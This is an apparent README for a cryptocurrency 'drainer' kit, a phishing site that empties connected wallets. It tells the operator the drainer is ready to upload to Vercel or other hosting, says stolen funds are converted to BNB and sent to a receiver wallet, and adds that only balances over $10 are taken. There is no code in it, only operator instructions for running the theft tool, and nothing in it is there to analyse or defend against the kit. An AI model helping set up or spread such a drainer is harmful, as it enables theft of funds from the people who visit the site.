wetinsupnah/Multi-Chain/README.md

 All is setup your drainer is ready to go.
 Upload your website on Vercel or any Hosting

+📛 All Drained will be convert into BNB and send to the receiver wallet ( BNB - BINANCE SMART CHAIN) 📛

 # 📛 THE DRAINER ONLY DRAIN BALANCE WITH MINIMUM 10.00$ FOR COVERING TRANSACTION FEE 📛